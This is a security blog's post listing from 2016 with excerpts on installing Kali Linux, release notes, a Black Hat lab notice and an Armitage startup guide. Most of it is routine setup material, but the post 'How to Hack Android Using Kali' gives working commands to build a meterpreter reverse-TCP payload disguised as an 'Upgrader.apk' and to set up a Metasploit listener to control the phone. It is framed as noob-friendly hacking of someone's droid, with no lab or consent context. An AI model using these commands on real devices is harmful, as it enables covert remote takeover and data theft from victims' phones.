Skip to main content

Posts

Showing posts from 2016

Kali Linux 2.2016 Installation on VMWare

Hi Guys, This is a New Installation of Kali Linux 2016.2, after a long post, of Kali Linux 1.0.3. The procedure of installation is same. I want to show you a new look and feel of Kali Linux Interface. Please go through step-by-step procedure of the screenshots provided for Kali Linux Installation. Prerequisite: --------------- 1. kali-linux-2016.2-i386.iso (can be downloaded from https://www.kali.org/downloads/ ) 2. virtual machine that supports kali linux 2.2016 (I am using VMware-workstation-full-12.1.1-3770994) 3. Windows 7 or higher (I am using Windows 10 Pro) Installation of Kali Linux 2016.2 (Step by Step): ---------------------------------------------------------- 1. Open VMWare and select "Create a New Virtual Machine" 2. Select the option "Typical"), as recommended by VMWare and then click on "Next". 3. If you have Kali Linux DVD, then select "Installer Disc" or if Kali Linux ISO is stored in hard drive then select "Installer disc i

Kali Linux 2016.2 Release

The second release of Kali Linux 2.0, aka Kali 2016.2. Here is the lists of changes made in Kali 2016.2. 1- New KDE, MATE, LXDE, e17, and Xfce Builds 2- Kali Linux Weekly ISOs 3- Bug Fixes and OS Improvements 4- Kali “sana” Repositories Retired (EOF of Sana) Download ISO Source:  https://www.kali.org/downloads/

Kali Linux Dojo Lab at Black Hat Vegas 2016

      Link: https://www.blackhat.com/us-16/kali-linux.html Join the Lab session on 4th August, 2016 at Mandalay Bay Hotel.

How to Hack Android Using Kali

Direct DownloadLinkIn this Tutorial You will be guided How to Hack Android Using Kali. This a completely noob friendly tutorial . With Pics in each steps.All that u need is just Kali Linux installed in your PC and a droid to hackStep 1: Fire-Up Kali:*.Open a terminal, and make aTrojan.apk*.You can do this by typing :*.msfpayload android/meterpreter/reverse_tcp LHOST=192.168.0.4 R > /root/Upgrader.apk(replace LHOST with your own IP)*.You can also hack android onWAN i.e. throughInteretby using yourPublic/External IPin the LHOST and byport forwardingStep 2: Open Another Terminal:*.Open another terminal until the file is being produced.*.Load metasploit console, by typing :msfconsoleStep 3: Set-Up a Listener:*.After it loads(generally takes some time), load the multi-handler exploit by typing :use exploit/multi/handler*.Set up a (reverse) payload by typing :set payload android/meterpreter/reverse_tcp*.To set L host type :set LHOST 192.168.0.4(Even if you are hacking on WAN type your pr

Metasploit (Armitage) start up

Step 1: Download Armitage The first step, of course, is to download Armtage. If you have  BackTrack  or the early versions of  Kali , you probably don't have Armitage, but you can get it  from Armitage's website . Click on the download button and it will pull up the following webpage. Make certain that you download the Linux version. Another download option includes using  the command line tool aptitude . Just type the following to install it. kali apt-get install armitage In addition, you can also use the GUI-based tool in Kali, the "Add/Remove Software," and search for "Armitage." Step 2: Start Metasploit Once you have Armitage downloaded onto your system, the next step is to start Matsploit. Make certain the postgreSQL server is started by typing: kali > service postgresql start Now, start Metasploit by typing: kali > msfconsole Step 3: Start Armitage Armitage uses a client/server architecture where Metasploit is the server and Armit